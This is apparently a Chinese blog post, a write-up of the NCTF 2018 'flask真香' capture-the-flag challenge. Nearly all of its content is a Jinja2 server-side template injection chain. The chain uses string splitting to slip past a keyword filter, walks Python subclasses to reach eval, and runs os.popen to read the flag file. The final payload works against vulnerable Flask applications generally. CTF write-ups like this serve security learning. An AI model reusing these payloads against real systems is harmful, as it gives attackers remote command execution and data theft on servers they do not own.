[NCTF 2018]flask真香

[NCTF 2018]flask真香
- - 题解

题解

常规测试Payload直接打进去, 发现参数可控

1.14.71.254:28119/{{5*6}}

不太相信这种比赛题不会设防火墙，直接写入

{{""['__class__']}}

没有回显，那就尝试以下字符串拼接过滤

{{""['__cla''ss__']}}

回显出来了，那接下来就步入正轨

%7B%7B""['__cla''ss__']['__ba''ses__'][0]['__su''bcla''sses__']()%7D%7D

随便用以前从网上找的现成脚本跑出warnings.catch_warnings下标 414

%7B%7B""['__cla''ss__']['__ba''ses__'][0]['__su''bcla''sses__']()[414]['__init__']['__glo''bals__']['__buil''tins__']['ev''al']("__im""port__('o''s').po""pen('tac%20/Th1s_is__F1114g').read()")%7D%7D

posted @ 2023-03-09 21:27 張冰冰阅读(132) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

张冰冰

[NCTF 2018]flask真香

[NCTF 2018]flask真香

题解

公告